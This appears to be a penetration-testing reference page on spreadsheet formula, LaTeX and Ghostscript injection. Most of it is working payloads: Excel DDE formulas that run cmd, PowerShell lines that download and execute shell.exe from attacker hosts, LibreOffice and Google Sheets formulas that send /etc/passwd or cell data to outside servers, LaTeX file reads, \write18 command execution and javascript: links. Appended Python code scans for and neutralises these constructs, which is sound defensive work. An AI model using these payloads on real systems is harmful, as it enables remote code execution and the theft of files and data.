# Formula/CSV/Doc/LaTeX/GhostScript Injection
## Formula Injection

### Info

If your **input** is being **reflected** inside **CSV files** (or any other file that is probably going to be opened by **Excel**), you may be able to inject Excel **formulas** that will be **executed** when the user **opens the file** or **clicks on a link** inside the spreadsheet.

{% hint style="danger" %}
Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to protect the user from malicious actions. Therefore, special effort on social engineering must be applied to the final payload.
{% endhint %}

### [Wordlist](https://github.com/payloadbox/csv-injection-payloads)

```
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
```

### Hyperlink

```
=cmd|' /C calc'!xxx
```

Additional commands can also be executed, such as downloading and executing a file using PowerShell:

```
$command = "powershell -c (New-Object System.Net.WebClient).DownloadFile('http://evil.com/malicious-file.exe', 'C:\temp\malicious-file.exe'); Start-Process 'C:\temp\malicious-file.exe'"
```

This command downloads a file from a specified URL and saves it to the local system. It then executes the downloaded file using the `Start-Process` command.

```
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```

### Local File Inclusion (LFI) in LibreOffice Calc

LibreOffice Calc can be used to read local files and exfiltrate data.
Here are some methods:

- Reading the first line from the local `/etc/passwd` file: `='file:///etc/passwd'#$passwd.A1`
- Exfiltrating the read data to an attacker-controlled server: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))`
- Exfiltrating more than one line: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
- DNS exfiltration (sending read data as DNS queries to an attacker-controlled DNS server): `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))`

### Google Sheets for Out-of-Band (OOB) Data Exfiltration

Google Sheets offers functions that can be exploited for OOB data exfiltration:

- **CONCATENATE**: Appends strings together - `=CONCATENATE(A2:E2)`
- **IMPORTXML**: Imports data from structured data types - `=IMPORTXML(CONCAT("http:///123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")`
- **IMPORTFEED**: Imports RSS or ATOM feeds - `=IMPORTFEED(CONCAT("http:////123.txt?v=", CONCATENATE(A2:E2)))`
- **IMPORTHTML**: Imports data from HTML tables or lists - `=IMPORTHTML (CONCAT("http:///123.txt?v=", CONCATENATE(A2:E2)),"table",1)`
- **IMPORTRANGE**: Imports a range of cells from another spreadsheet - `=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")`
- **IMAGE**: Inserts an image into a cell - `=IMAGE("https:///images/srpr/logo3w.png")`

## LaTeX Injection

Servers on the internet that **convert LaTeX code to PDF** usually use **`pdflatex`**.\
This program uses 3 main options to (dis)allow command execution:

* **`--no-shell-escape`**: **Disable** the `\write18{command}` construct, even if it is enabled in the texmf.cnf file.
* **`--shell-restricted`**: Same as `--shell-escape`, but **limited** to a 'safe' set of **predefined** commands (on Ubuntu 16.04 the list is in `/usr/share/texmf/web2c/texmf.cnf`).
* **`--shell-escape`**: **Enable** the `\write18{command}` construct. The command can be any shell command. This construct is normally disallowed for security reasons.

However, there are other ways to execute commands, so to avoid RCE it's very important to use `--shell-restricted`.

### Read file

You might need to adjust the injection with wrappers such as \[ or $.

```latex
\input{/etc/passwd}
\include{password} % load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```

#### Read single-line file

To read a single-line file from a shell, you can use the following command:

```bash
cat filename
```

This command will display the contents of the file on the terminal. The LaTeX equivalent:

```latex
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```

#### Read multi-line file

To read a file that contains multiple lines from a shell, you can use the following command:

```bash
cat filename
```

This command will display the contents of the file on the screen. The LaTeX equivalent:

```latex
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline
    \text{\fileline}
\repeat
\closein\file
```

### Write file

```latex
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
```

### Command execution

The command's input is redirected to stdin; use a temp file to retrieve the output.

```latex
\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

% allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

% If mpost is not allowed there are other commands you might be able to execute
%% Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
%% Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
%% Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
%% Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
```

If you get any LaTeX error, consider using base64 to get the result without bad characters:

```latex
\immediate\write18{env | base64 > test.tex}
\input{test.tex}
```

```latex
\input|ls|base64
\input{|"/bin/hostname"}
```

### Cross Site Scripting

From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)

```latex
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```

## Ghostscript Injection

**Check [https://blog.redteam-pentesting.de/2023/ghostscript-overview/](https://blog.redteam-pentesting.de/2023/ghostscript-overview/)**
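
Export-side mitigation for the Formula Injection section above, as an added example that is not part of the original page: every field is quoted and any cell a spreadsheet would evaluate is prefixed so it is shown as text. The function names and the sample rows are constructed for illustration; the prefix check does not cover the `DDE (...)` wordlist entry, which does not begin with a trigger character.

```python
import csv
import io

# Leading characters that make Excel, LibreOffice Calc or Google Sheets
# evaluate a cell as a formula instead of showing it as text.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def _is_plain_number(text):
    """Signed numbers such as -42.5 are data, not formulas."""
    try:
        float(text)
        return True
    except ValueError:
        return False


def is_formula_like(value):
    """True if a spreadsheet could evaluate this cell when the file is opened."""
    # Conservative choice: ignore leading spaces before testing the prefix.
    stripped = value.lstrip(" ")
    return stripped.startswith(FORMULA_TRIGGERS) and not _is_plain_number(stripped)


def neutralise_cell(value):
    """Return the cell as text that is displayed rather than evaluated."""
    text = "" if value is None else str(value)
    # A leading apostrophe is the commonly recommended way to force text.
    return "'" + text if is_formula_like(text) else text


def to_safe_csv(rows):
    """Serialise rows with every field quoted and formula prefixes neutralised."""
    buf = io.StringIO()
    # QUOTE_ALL keeps embedded commas and quotes from opening a new cell.
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralise_cell(cell) for cell in row])
    return buf.getvalue()


def unsafe_cells(csv_text):
    """Audit helper: (row, column, value) for each formula-like cell in a CSV."""
    return [
        (r, c, cell)
        for r, row in enumerate(csv.reader(io.StringIO(csv_text)))
        for c, cell in enumerate(row)
        if is_formula_like(cell)
    ]


# Constructed sample export; the comment column is user-controlled and carries
# formulas from the wordlist on this page plus a quote/comma break-out attempt.
SAMPLE_ROWS = [
    ["name", "comment", "balance"],
    ["alice", "=10+20+cmd|' /C calc'!A0", "-42.5"],
    ["bob", "@SUM(1+9)*cmd|' /C calc'!A0", "17"],
    ["carol", 'x",=IMAGE("https://example.invalid/logo.png")', "+3"],
]


def naive_csv(rows):
    """The vulnerable export for comparison: plain join, no quoting."""
    return "\n".join(",".join(row) for row in rows)


if __name__ == "__main__":
    print("naive export :", unsafe_cells(naive_csv(SAMPLE_ROWS)))
    print("safe export  :", unsafe_cells(to_safe_csv(SAMPLE_ROWS)))
    print(to_safe_csv(SAMPLE_ROWS))
```

`unsafe_cells` can also be run over CSV files an application has already produced, to find exports that still contain evaluable cells.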
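
Server-side screening for the LaTeX Injection section above, as an added example that is not part of the original page: it flags the file-read, file-write, command-execution and `javascript:` link constructs listed on this page in a submitted document, and builds a `pdflatex` command line with shell escape disabled. `scan_latex`, `pdflatex_invocation` and the sample document are hypothetical names and constructed data; `openin_any` and `openout_any` are texmf.cnf variables set here through the environment.

```python
import re

# Control sequences this page uses for file read, file write and command
# execution. A denylist is a screening layer only: TeX can form control
# sequences indirectly, so the compiler options below remain the real control.
RISKY = {
    "input": "file-read", "include": "file-read", "lstinputlisting": "file-read",
    "verbatiminput": "file-read", "newread": "file-read", "openin": "file-read",
    "read": "file-read", "newwrite": "file-write", "openout": "file-write",
    "write": "file-write",
}
CONTROL_SEQ = re.compile(r"\\([A-Za-z]+)(\d*)")
PIPE_INPUT = re.compile(r"\\input\s*\{?\s*\|")  # \input|cmd and \input{|"cmd"}
JS_LINK = re.compile(r"\\(?:url|href)\s*\{\s*javascript:", re.IGNORECASE)


def scan_latex(source):
    """Return (line number, category, construct) for each risky construct."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if PIPE_INPUT.search(line):
            findings.append((lineno, "command-exec", "\\input|"))
        if JS_LINK.search(line):
            findings.append((lineno, "xss", "javascript: link"))
        for match in CONTROL_SEQ.finditer(line):
            name, digits = match.groups()
            if name == "write" and digits == "18":
                findings.append((lineno, "command-exec", "\\write18"))
            elif name in RISKY:
                findings.append((lineno, RISKY[name], "\\" + name))
    return findings


def pdflatex_invocation(tex_file, out_dir):
    """Build argv and extra environment for compiling untrusted input."""
    argv = ["pdflatex", "--no-shell-escape", "-interaction=nonstopmode",
            "-halt-on-error", "-output-directory=" + out_dir, tex_file]
    # "p" (paranoid) is the most restrictive file-access setting for
    # \openin / \openout; merge this dict into the process environment.
    env = {"openin_any": "p", "openout_any": "p"}
    return argv, env


# Constructed submission that reuses constructs shown on this page.
SAMPLE_TEX = r"""\documentclass{article}
\begin{document}
Hello $x^2$
\input{/etc/passwd}
\immediate\write18{env > output}
\input{|"/bin/hostname"}
\href{javascript:alert(1)}{placeholder}
\newwrite\outfile
\openout\outfile=cmd.tex
\end{document}"""

if __name__ == "__main__":
    for finding in scan_latex(SAMPLE_TEX):
        print(finding)
    print(pdflatex_invocation("job.tex", "out"))
```

Treat any finding as grounds to reject the submission before compiling; documents that pass should still be compiled with the restrictive invocation in a sandboxed account.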